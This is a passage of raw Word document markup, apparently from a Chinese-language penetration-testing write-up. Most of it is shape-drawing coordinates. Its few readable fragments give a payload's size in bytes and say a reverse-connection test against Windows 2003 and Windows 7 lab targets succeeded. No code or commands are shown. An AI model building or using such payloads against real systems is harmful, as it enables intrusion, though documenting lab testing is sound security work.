          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload大小如下：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4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608字节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37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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第一次靶机测试：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分别测试Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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2003，Windws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7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7，reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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OK。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group style="position:absolute;margin-left:519.500pt;margin-top:104.500pt;width:0.500pt;height:194.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,2090" coordsize="10,3890">
        <v:shape style="position:absolute;left:10390;top:2090;width:10;height:3890" coordorigin="10390,2090" coordsize="10,3890" path="m10402,2095l10402,2095,10402,2095,10402,2095,10402,2095,10402,2095,10402,2095,10402,2096,10402,2096,10402,2096,10402,2097,10402,2097,10402,2098,10402,2099,10402,2100,10402,2101,10402,2103,10402,2104,10402,2106,10402,2108,10402,2111,10402,2113,10402,2116,10402,2120,10402,2123,10402,2127,10402,2131,10402,2136,10402,2140,10402,2146,10402,2151,10402,2157,10402,2164,10402,2171,10402,2178,10402,2186,10402,2194,10402,2203,10402,2212,10402,2222,10402,2232,10402,2243,10402,2254,10402,2266,10402,2278,10402,2292,10402,2305,10402,2320,10402,2335,10402,2350,10402,2366,10402,2383,10402,2401,10402,2419,10402,2438,10402,2458,10402,2479,10402,2500,10402,2522,10402,2545,10402,2569,10402,2593,10402,2619,10402,2645,10402,2672,10402,2700,10402,2728,10402,2758,10402,2789,10402,2820,10402,2853,10402,2886,10402,2921,10402,2956,10402,2992,10402,3030,10402,3068,10402,3108,10402,3148,10402,3190,10402,3232,10402,3276,10402,3321,10402,3367,10402,3414,10402,3462,10402,3512,10402,3562,10402,3614,10402,3667,10402,3721,10402,3777,10402,3833,10402,3891,10402,3950,10402,4011,10402,4073,10402,4136,10402,4200,10402,4266,10402,4333,10402,4402,10402,4472,10402,4543,10402,4616,10402,4690,10402,4765,10402,4842,10402,4921,10402,5001,10402,5082,10402,5165,10402,5250,10402,5336,10402,5423,10402,5512,10402,5603,10402,5695,10402,5789,10402,5885,10402,5982e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:103.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:2070;width:8990;height:410" coordorigin="1490,2070" coordsize="8990,410" path="m1510,2095l1510,2095,1510,2095,1510,2095,1510,2095,1510,2095,1510,2095,1511,2095,1512,2095,1512,2095,1514,2095,1515,2095,1517,2095,1519,2095,1521,2095,1524,2095,1528,2095,1532,2095,1536,2095,1541,2095,1546,2095,1552,2095,1559,2095,1566,2095,1575,2095,1583,2095,1593,2095,1603,2095,1615,2095,1627,2095,1640,2095,1654,2095,1668,2095,1684,2095,1701,2095,1719,2095,1738,2095,1758,2095,1780,2095,1802,2095,1826,2095,1851,2095,1877,2095,1904,2095,1933,2095,1963,2095,1995,2095,2028,2095,2063,2095,2099,2095,2136,2095,2175,2095,2216,2095,2259,2095,2303,2095,2348,2095,2396,2095,2445,2095,2496,2095,2549,2095,2604,2095,2660,2095,2719,2095,2779,2095,2841,2095,2906,2095,2972,2095,3041,2095,3112,2095,3184,2095,3259,2095,3336,2095,3416,2095,3498,2095,3582,2095,3668,2095,3757,2095,3848,2095,3941,2095,4037,2095,4136,2095,4236,2095,4340,2095,4446,2095,4555,2095,4666,2095,4780,2095,4897,2095,5017,2095,5139,2095,5264,2095,5392,2095,5523,2095,5657,2095,5793,2095,5933,2095,6076,2095,6222,2095,6370,2095,6522,2095,6677,2095,6835,2095,6997,2095,7161,2095,7329,2095,7500,2095,7675,2095,7853,2095,8034,2095,8219,2095,8407,2095,8598,2095,8793,2095,8992,2095,9194,2095,9400,2095,9609,2095,9823,2095,10039,2095,10260,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2096,10484,2096,10484,2096,10484,2096,10484,2096,10484,2096,10484,2097,10484,2097,10484,2097,10484,2098,10484,2098,10484,2098,10484,2099,10484,2099,10484,2100,10484,2100,10484,2101,10484,2101,10484,2102,10484,2103,10484,2103,10484,2104,10484,2105,10484,2106,10484,2107,10484,2108,10484,2109,10484,2110,10484,2111,10484,2112,10484,2113,10484,2115,10484,2116,10484,2118,10484,2119,10484,2121,10484,2122,10484,2124,10484,2126,10484,2128,10484,2130,10484,2132,10484,2134,10484,2136,10484,2138,10484,2140,10484,2143,10484,2145,10484,2148,10484,2150,10484,2153,10484,2156,10484,2159,10484,2162,10484,2165,10484,2168,10484,2171,10484,2174,10484,2178,10484,2181,10484,2185,10484,2189,10484,2193,10484,2197,10484,2201,10484,2205,10484,2209,10484,2214,10484,2218,10484,2223,10484,2227,10484,2232,10484,2237,10484,2242,10484,2248,10484,2253,10484,2258,10484,2264,10484,2270,10484,2275,10484,2281,10484,2287,10484,2294,10484,2300,10484,2306,10484,2313,10484,2320,10484,2327,10484,2334,10484,2341,10484,2348,10484,2356,10484,2363,10484,2371,10484,2379,10484,2387,10484,2395,10484,2403,10484,2412,10484,2420,10484,2429,10484,2438,10484,2447,10484,2456,10484,2466,10484,2475,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10483,2485,10482,2485,10482,2485,10480,2485,10479,2485,10477,2485,10475,2485,10473,2485,10470,2485,10466,2485,10462,2485,10458,2485,10453,2485,10448,2485,10442,2485,10435,2485,10428,2485,10419,2485,10411,2485,10401,2485,10391,2485,10379,2485,10367,2485,10354,2485,10340,2485,10326,2485,10310,2485,10293,2485,10275,2485,10256,2485,10236,2485,10215,2485,10192,2485,10168,2485,10143,2485,10117,2485,10090,2485,10061,2485,10031,2485,9999,2485,9966,2485,9931,2485,9895,2485,9858,2485,9819,2485,9778,2485,9735,2485,9691,2485,9646,2485,9598,2485,9549,2485,9498,2485,9445,2485,9391,2485,9334,2485,9275,2485,9215,2485,9153,2485,9088,2485,9022,2485,8953,2485,8883,2485,8810,2485,8735,2485,8658,2485,8578,2485,8497,2485,8413,2485,8326,2485,8238,2485,8146,2485,8053,2485,7957,2485,7859,2485,7758,2485,7654,2485,7548,2485,7439,2485,7328,2485,7214,2485,7097,2485,6977,2485,6855,2485,6730,2485,6602,2485,6471,2485,6337,2485,6201,2485,6061,2485,5918,2485,5773,2485,5624,2485,5472,2485,5317,2485,5159,2485,4997,2485,4833,2485,4665,2485,4494,2485,4319,2485,4141,2485,3960,2485,3776,2485,3587,2485,3396,2485,3201,2485,3002,2485,2800,2485,2594,2485,2385,2485,2172,2485,1955,2485,1734,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2484,1510,2484,1510,2484,1510,2484,1510,2484,1510,2483,1510,2483,1510,2483,1510,2482,1510,2482,1510,2482,1510,2481,1510,2481,1510,2480,1510,2480,1510,2479,1510,2478,1510,2478,1510,2477,1510,2476,1510,2475,1510,2474,1510,2474,1510,2473,1510,2472,1510,2470,1510,2469,1510,2468,1510,2467,1510,2466,1510,2464,1510,2463,1510,2461,1510,2460,1510,2458,1510,2456,1510,2455,1510,2453,1510,2451,1510,2449,1510,2447,1510,2445,1510,2442,1510,2440,1510,2438,1510,2435,1510,2433,1510,2430,1510,2427,1510,2425,1510,2422,1510,2419,1510,2416,1510,2412,1510,2409,1510,2406,1510,2402,1510,2399,1510,2395,1510,2391,1510,2388,1510,2384,1510,2380,1510,2375,1510,2371,1510,2367,1510,2362,1510,2358,1510,2353,1510,2348,1510,2343,1510,2338,1510,2333,1510,2327,1510,2322,1510,2316,1510,2311,1510,2305,1510,2299,1510,2293,1510,2287,1510,2280,1510,2274,1510,2267,1510,2261,1510,2254,1510,2247,1510,2240,1510,2232,1510,2225,1510,2217,1510,2209,1510,2202,1510,2194,1510,2185,1510,2177,1510,2169,1510,2160,1510,2151,1510,2142,1510,2133,1510,2124,1510,2114,1510,2105,1510,2095e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:10" coordorigin="1490,2090" coordsize="8990,10" path="m1510,2103l1510,2103,1510,2103,1510,2103,1510,2103,1510,2103,1510,2103,1511,2103,1512,2103,1512,2103,1514,2103,1515,2103,1517,2103,1519,2103,1521,2103,1524,2103,1528,2103,1532,2103,1536,2103,1541,2103,1546,2103,1552,2103,1559,2103,1566,2103,1575,2103,1583,2103,1593,2103,1603,2103,1615,2103,1627,2103,1640,2103,1654,2103,1668,2103,1684,2103,1701,2103,1719,2103,1738,2103,1758,2103,1780,2103,1802,2103,1826,2103,1851,2103,1877,2103,1904,2103,1933,2103,1963,2103,1995,2103,2028,2103,2063,2103,2099,2103,2136,2103,2175,2103,2216,2103,2259,2103,2303,2103,2348,2103,2396,2103,2445,2103,2496,2103,2549,2103,2604,2103,2660,2103,2719,2103,2779,2103,2841,2103,2906,2103,2972,2103,3041,2103,3112,2103,3184,2103,3259,2103,3336,2103,3416,2103,3498,2103,3582,2103,3668,2103,3757,2103,3848,2103,3941,2103,4037,2103,4136,2103,4236,2103,4340,2103,4446,2103,4555,2103,4666,2103,4780,2103,4897,2103,5017,2103,5139,2103,5264,2103,5392,2103,5523,2103,5657,2103,5793,2103,5933,2103,6076,2103,6222,2103,6370,2103,6522,2103,6677,2103,6835,2103,6997,2103,7161,2103,7329,2103,7500,2103,7675,2103,7853,2103,8034,2103,8219,2103,8407,2103,8598,2103,8793,2103,8992,2103,9194,2103,9400,2103,9609,2103,9823,2103,10039,2103,10260,2103,10484,2103e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:103.800pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId26" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:123.500pt;width:449.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2470" coordsize="8990,330">
        <v:shape style="position:absolute;left:1490;top:2470;width:8990;height:330" coordorigin="1490,2470" coordsize="8990,330" path="m1510,2485l1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1511,2485,1512,2485,1512,2485,1514,2485,1515,2485,1517,2485,1519,2485,1521,2485,1524,2485,1528,2485,1532,2485,1536,2485,1541,2485,1546,2485,1552,2485,1559,2485,1566,2485,1575,2485,1583,2485,1593,2485,1603,2485,1615,2485,1627,2485,1640,2485,1654,2485,1668,2485,1684,2485,1701,2485,1719,2485,1738,2485,1758,2485,1780,2485,1802,2485,1826,2485,1851,2485,1877,2485,1904,2485,1933,2485,1963,2485,1995,2485,2028,2485,2063,2485,2099,2485,2136,2485,2175,2485,2216,2485,2259,2485,2303,2485,2348,2485,2396,2485,2445,2485,2496,2485,2549,2485,2604,2485,2660,2485,2719,2485,2779,2485,2841,2485,2906,2485,2972,2485,3041,2485,3112,2485,3184,2485,3259,2485,3336,2485,3416,2485,3498,2485,3582,2485,3668,2485,3757,2485,3848,2485,3941,2485,4037,2485,4136,2485,4236,2485,4340,2485,4446,2485,4555,2485,4666,2485,4780,2485,4897,2485,5017,2485,5139,2485,5264,2485,5392,2485,5523,2485,5657,2485,5793,2485,5933,2485,6076,2485,6222,2485,6370,2485,6522,2485,6677,2485,6835,2485,6997,2485,7161,2485,7329,2485,7500,2485,7675,2485,7853,2485,8034,2485,8219,2485,8407,2485,8598,2485,8793,2485,8992,2485,9194,2485,9400,2485,9609,2485,9823,2485,10039,2485,10260,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2486,10484,2486,10484,2486,10484,2486,10484,2486,10484,2486,10484,2486,10484,2486,10484,2487,10484,2487,10484,2487,10484,2487,10484,2488,10484,2488,10484,2488,10484,2489,10484,2489,10484,2490,10484,2490,10484,2491,10484,2491,10484,2492,10484,2492,10484,2493,10484,2494,10484,2494,10484,2495,10484,2496,10484,2497,10484,2498,10484,2499,10484,2500,10484,2501,10484,2502,10484,2503,10484,2504,10484,2506,10484,2507,10484,2508,10484,2510,10484,2511,10484,2513,10484,2514,10484,2516,10484,2518,10484,2520,10484,2522,10484,2523,10484,2525,10484,2528,10484,2530,10484,2532,10484,2534,10484,2537,10484,2539,10484,2542,10484,2544,10484,2547,10484,2550,10484,2552,10484,2555,10484,2558,10484,2561,10484,2565,10484,2568,10484,2571,10484,2575,10484,2578,10484,2582,10484,2586,10484,2589,10484,2593,10484,2597,10484,2601,10484,2606,10484,2610,10484,2614,10484,2619,10484,2623,10484,2628,10484,2633,10484,2638,10484,2643,10484,2648,10484,2653,10484,2659,10484,2664,10484,2670,10484,2675,10484,2681,10484,2687,10484,2693,10484,2699,10484,2706,10484,2712,10484,2719,10484,2725,10484,2732,10484,2739,10484,2746,10484,2753,10484,2761,10484,2768,10484,2776,10484,2783,10484,2791,10484,2799,10484,2807,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10483,2815,10482,2815,10482,2815,10480,2815,10479,2815,10477,2815,10475,2815,10473,2815,10470,2815,10466,2815,10462,2815,10458,2815,10453,2815,10448,2815,10442,2815,10435,2815,10428,2815,10419,2815,10411,2815,10401,2815,10391,2815,10379,2815,10367,2815,10354,2815,10340,2815,10326,2815,10310,2815,10293,2815,10275,2815,10256,2815,10236,2815,10215,2815,10192,2815,10168,2815,10143,2815,10117,2815,10090,2815,10061,2815,10031,2815,9999,2815,9966,2815,9931,2815,9895,2815,9858,2815,9819,2815,9778,2815,9735,2815,9691,2815,9646,2815,9598,2815,9549,2815,9498,2815,9445,2815,9391,2815,9334,2815,9275,2815,9215,2815,9153,2815,9088,2815,9022,2815,8953,2815,8883,2815,8810,2815,8735,2815,8658,2815,8578,2815,8497,2815,8413,2815,8326,2815,8238,2815,8146,2815,8053,2815,7957,2815,7859,2815,7758,2815,7654,2815,7548,2815,7439,2815,7328,2815,7214,2815,7097,2815,6977,2815,6855,2815,6730,2815,6602,2815,6471,2815,6337,2815,6201,2815,6061,2815,5918,2815,5773,2815,5624,2815,5472,2815,5317,2815,5159,2815,4997,2815,4833,2815,4665,2815,4494,2815,4319,2815,4141,2815,3960,2815,3776,2815,3587,2815,3396,2815,3201,2815,3002,2815,2800,2815,2594,2815,2385,2815,2172,2815,1955,2815,1734,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2814,1510,2814,1510,2814,1510,2814,1510,2814,1510,2813,1510,2813,1510,2813,1510,2812,1510,2812,1510,2812,1510,2811,1510,2811,1510,2810,1510,2810,1510,2809,1510,2808,1510,2808,1510,2807,1510,2806,1510,2805,1510,2805,1510,2804,1510,2803,1510,2802,1510,2801,1510,2800,1510,2799,1510,2798,1510,2796,1510,2795,1510,2794,1510,2792,1510,2791,1510,2789,1510,2788,1510,2786,1510,2785,1510,2783,1510,2781,1510,2779,1510,2777,1510,2775,1510,2773,1510,2771,1510,2769,1510,2766,1510,2764,1510,2762,1510,2759,1510,2756,1510,2754,1510,2751,1510,2748,1510,2745,1510,2742,1510,2739,1510,2736,1510,2733,1510,2729,1510,2726,1510,2722,1510,2719,1510,2715,1510,2711,1510,2707,1510,2703,1510,2699,1510,2695,1510,2691,1510,2686,1510,2682,1510,2677,1510,2673,1510,2668,1510,2663,1510,2658,1510,2653,1510,2647,1510,2642,1510,2637,1510,2631,1510,2625,1510,2619,1510,2614,1510,2607,1510,2601,1510,2595,1510,2589,1510,2582,1510,2575,1510,2569,1510,2562,1510,2555,1510,2547,1510,2540,1510,2533,1510,2525,1510,2517,1510,2510,1510,2502,1510,2493,1510,2485e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:123.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2470" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:2470;width:30;height:350" coordorigin="1490,2470" coordsize="30,350" path="m1517,2485l1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2485,1517,2486,1517,2486,1517,2486,1517,2486,1517,2486,1517,2486,1517,2486,1517,2486,1517,2487,1517,2487,1517,2487,1517,2487,1517,2488,1517,2488,1517,2488,1517,2489,1517,2489,1517,2490,1517,2490,1517,2491,1517,2491,1517,2492,1517,2492,1517,2493,1517,2494,1517,2494,1517,2495,1517,2496,1517,2497,1517,2498,1517,2499,1517,2500,1517,2501,1517,2502,1517,2503,1517,2504,1517,2506,1517,2507,1517,2508,1517,2510,1517,2511,1517,2513,1517,2514,1517,2516,1517,2518,1517,2520,1517,2522,1517,2523,1517,2525,1517,2528,1517,2530,1517,2532,1517,2534,1517,2537,1517,2539,1517,2542,1517,2544,1517,2547,1517,2550,1517,2552,1517,2555,1517,2558,1517,2561,1517,2565,1517,2568,1517,2571,1517,2575,1517,2578,1517,2582,1517,2586,1517,2589,1517,2593,1517,2597,1517,2601,1517,2606,1517,2610,1517,2614,1517,2619,1517,2623,1517,2628,1517,2633,1517,2638,1517,2643,1517,2648,1517,2653,1517,2659,1517,2664,1517,2670,1517,2675,1517,2681,1517,2687,1517,2693,1517,2699,1517,2706,1517,2712,1517,2719,1517,2725,1517,2732,1517,2739,1517,2746,1517,2753,1517,2761,1517,2768,1517,2776,1517,2783,1517,2791,1517,2799,1517,2807,1517,2815e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:139.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2790" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:2790;width:8990;height:390" coordorigin="1490,2790" coordsize="8990,390" path="m1510,2815l1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1511,2815,1512,2815,1512,2815,1514,2815,1515,2815,1517,2815,1519,2815,1521,2815,1524,2815,1528,2815,1532,2815,1536,2815,1541,2815,1546,2815,1552,2815,1559,2815,1566,2815,1575,2815,1583,2815,1593,2815,1603,2815,1615,2815,1627,2815,1640,2815,1654,2815,1668,2815,1684,2815,1701,2815,1719,2815,1738,2815,1758,2815,1780,2815,1802,2815,1826,2815,1851,2815,1877,2815,1904,2815,1933,2815,1963,2815,1995,2815,2028,2815,2063,2815,2099,2815,2136,2815,2175,2815,2216,2815,2259,2815,2303,2815,2348,2815,2396,2815,2445,2815,2496,2815,2549,2815,2604,2815,2660,2815,2719,2815,2779,2815,2841,2815,2906,2815,2972,2815,3041,2815,3112,2815,3184,2815,3259,2815,3336,2815,3416,2815,3498,2815,3582,2815,3668,2815,3757,2815,3848,2815,3941,2815,4037,2815,4136,2815,4236,2815,4340,2815,4446,2815,4555,2815,4666,2815,4780,2815,4897,2815,5017,2815,5139,2815,5264,2815,5392,2815,5523,2815,5657,2815,5793,2815,5933,2815,6076,2815,6222,2815,6370,2815,6522,2815,6677,2815,6835,2815,6997,2815,7161,2815,7329,2815,7500,2815,7675,2815,7853,2815,8034,2815,8219,2815,8407,2815,8598,2815,8793,2815,8992,2815,9194,2815,9400,2815,9609,2815,9823,2815,10039,2815,10260,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2817,10484,2817,10484,2817,10484,2817,10484,2817,10484,2818,10484,2818,10484,2818,10484,2819,10484,2819,10484,2820,10484,2820,10484,2821,10484,2821,10484,2822,10484,2823,10484,2823,10484,2824,10484,2825,10484,2826,10484,2827,10484,2828,10484,2829,10484,2830,10484,2831,10484,2832,10484,2833,10484,2834,10484,2836,10484,2837,10484,2839,10484,2840,10484,2842,10484,2843,10484,2845,10484,2847,10484,2849,10484,2850,10484,2852,10484,2855,10484,2857,10484,2859,10484,2861,10484,2863,10484,2866,10484,2868,10484,2871,10484,2874,10484,2877,10484,2879,10484,2882,10484,2885,10484,2889,10484,2892,10484,2895,10484,2899,10484,2902,10484,2906,10484,2909,10484,2913,10484,2917,10484,2921,10484,2925,10484,2929,10484,2934,10484,2938,10484,2943,10484,2947,10484,2952,10484,2957,10484,2962,10484,2967,10484,2972,10484,2978,10484,2983,10484,2989,10484,2994,10484,3000,10484,3006,10484,3012,10484,3019,10484,3025,10484,3031,10484,3038,10484,3045,10484,3052,10484,3059,10484,3066,10484,3073,10484,3081,10484,3088,10484,3096,10484,3104,10484,3112,10484,3120,10484,3128,10484,3137,10484,3145,10484,3154,10484,3163,10484,3172,10484,3181,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10483,3191,10482,3191,10482,3191,10480,3191,10479,3191,10477,3191,10475,3191,10473,3191,10470,3191,10466,3191,10462,3191,10458,3191,10453,3191,10448,3191,10442,3191,10435,3191,10428,3191,10419,3191,10411,3191,10401,3191,10391,3191,10379,3191,10367,3191,10354,3191,10340,3191,10326,3191,10310,3191,10293,3191,10275,3191,10256,3191,10236,3191,10215,3191,10192,3191,10168,3191,10143,3191,10117,3191,10090,3191,10061,3191,10031,3191,9999,3191,9966,3191,9931,3191,9895,3191,9858,3191,9819,3191,9778,3191,9735,3191,9691,3191,9646,3191,9598,3191,9549,3191,9498,3191,9445,3191,9391,3191,9334,3191,9275,3191,9215,3191,9153,3191,9088,3191,9022,3191,8953,3191,8883,3191,8810,3191,8735,3191,8658,3191,8578,3191,8497,3191,8413,3191,8326,3191,8238,3191,8146,3191,8053,3191,7957,3191,7859,3191,7758,3191,7654,3191,7548,3191,7439,3191,7328,3191,7214,3191,7097,3191,6977,3191,6855,3191,6730,3191,6602,3191,6471,3191,6337,3191,6201,3191,6061,3191,5918,3191,5773,3191,5624,3191,5472,3191,5317,3191,5159,3191,4997,3191,4833,3191,4665,3191,4494,3191,4319,3191,4141,3191,3960,3191,3776,3191,3587,3191,3396,3191,3201,3191,3002,3191,2800,3191,2594,3191,2385,3191,2172,3191,1955,3191,1734,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3189,1510,3189,1510,3189,1510,3189,1510,3188,1510,3188,1510,3188,1510,3187,1510,3187,1510,3186,1510,3186,1510,3185,1510,3185,1510,3184,1510,3183,1510,3183,1510,3182,1510,3181,1510,3180,1510,3179,1510,3178,1510,3177,1510,3176,1510,3175,1510,3174,1510,3173,1510,3172,1510,3170,1510,3169,1510,3167,1510,3166,1510,3164,1510,3163,1510,3161,1510,3159,1510,3157,1510,3156,1510,3154,1510,3151,1510,3149,1510,3147,1510,3145,1510,3143,1510,3140,1510,3138,1510,3135,1510,3132,1510,3129,1510,3127,1510,3124,1510,3121,1510,3117,1510,3114,1510,3111,1510,3107,1510,3104,1510,3100,1510,3097,1510,3093,1510,3089,1510,3085,1510,3081,1510,3077,1510,3072,1510,3068,1510,3063,1510,3059,1510,3054,1510,3049,1510,3044,1510,3039,1510,3034,1510,3028,1510,3023,1510,3017,1510,3012,1510,3006,1510,3000,1510,2994,1510,2987,1510,2981,1510,2975,1510,2968,1510,2961,1510,2954,1510,2947,1510,2940,1510,2933,1510,2925,1510,2918,1510,2910,1510,2902,1510,2894,1510,2886,1510,2878,1510,2869,1510,2861,1510,2852,1510,2843,1510,2834,1510,2825,1510,2815e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:140.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2810" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2810;width:30;height:370" coordorigin="1490,2810" coordsize="30,370" path="m1517,2815l1517,2815,1517,2815,1517,2815,1517,2815,1517,2815,1517,2815,1517,2815,1517,2815,1517,2816,1517,2816,1517,2816,1517,2816,1517,2816,1517,2816,1517,2816,1517,2816,1517,2816,1517,2817,1517,2817,1517,2817,1517,2817,1517,2817,1517,2818,1517,2818,1517,2818,1517,2819,1517,2819,1517,2820,1517,2820,1517,2821,1517,2821,1517,2822,1517,2823,1517,2823,1517,2824,1517,2825,1517,2826,1517,2827,1517,2828,1517,2829,1517,2830,1517,2831,1517,2832,1517,2833,1517,2834,1517,2836,1517,2837,1517,2839,1517,2840,1517,2842,1517,2843,1517,2845,1517,2847,1517,2849,1517,2850,1517,2852,1517,2855,1517,2857,1517,2859,1517,2861,1517,2863,1517,2866,1517,2868,1517,2871,1517,2874,1517,2877,1517,2879,1517,2882,1517,2885,1517,2889,1517,2892,1517,2895,1517,2899,1517,2902,1517,2906,1517,2909,1517,2913,1517,2917,1517,2921,1517,2925,1517,2929,1517,2934,1517,2938,1517,2943,1517,2947,1517,2952,1517,2957,1517,2962,1517,2967,1517,2972,1517,2978,1517,2983,1517,2989,1517,2994,1517,3000,1517,3006,1517,3012,1517,3019,1517,3025,1517,3031,1517,3038,1517,3045,1517,3052,1517,3059,1517,3066,1517,3073,1517,3081,1517,3088,1517,3096,1517,3104,1517,3112,1517,3120,1517,3128,1517,3137,1517,3145,1517,3154,1517,3163,1517,3172,1517,3181,1517,3191e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:158.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3170" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:3170;width:8990;height:370" coordorigin="1490,3170" coordsize="8990,370" path="m1510,3191l1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1511,3191,1512,3191,1512,3191,1514,3191,1515,3191,1517,3191,1519,3191,1521,3191,1524,3191,1528,3191,1532,3191,1536,3191,1541,3191,1546,3191,1552,3191,1559,3191,1566,3191,1575,3191,1583,3191,1593,3191,1603,3191,1615,3191,1627,3191,1640,3191,1654,3191,1668,3191,1684,3191,1701,3191,1719,3191,1738,3191,1758,3191,1780,3191,1802,3191,1826,3191,1851,3191,1877,3191,1904,3191,1933,3191,1963,3191,1995,3191,2028,3191,2063,3191,2099,3191,2136,3191,2175,3191,2216,3191,2259,3191,2303,3191,2348,3191,2396,3191,2445,3191,2496,3191,2549,3191,2604,3191,2660,3191,2719,3191,2779,3191,2841,3191,2906,3191,2972,3191,3041,3191,3112,3191,3184,3191,3259,3191,3336,3191,3416,3191,3498,3191,3582,3191,3668,3191,3757,3191,3848,3191,3941,3191,4037,3191,4136,3191,4236,3191,4340,3191,4446,3191,4555,3191,4666,3191,4780,3191,4897,3191,5017,3191,5139,3191,5264,3191,5392,3191,5523,3191,5657,3191,5793,3191,5933,3191,6076,3191,6222,3191,6370,3191,6522,3191,6677,3191,6835,3191,6997,3191,7161,3191,7329,3191,7500,3191,7675,3191,7853,3191,8034,3191,8219,3191,8407,3191,8598,3191,8793,3191,8992,3191,9194,3191,9400,3191,9609,3191,9823,3191,10039,3191,10260,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191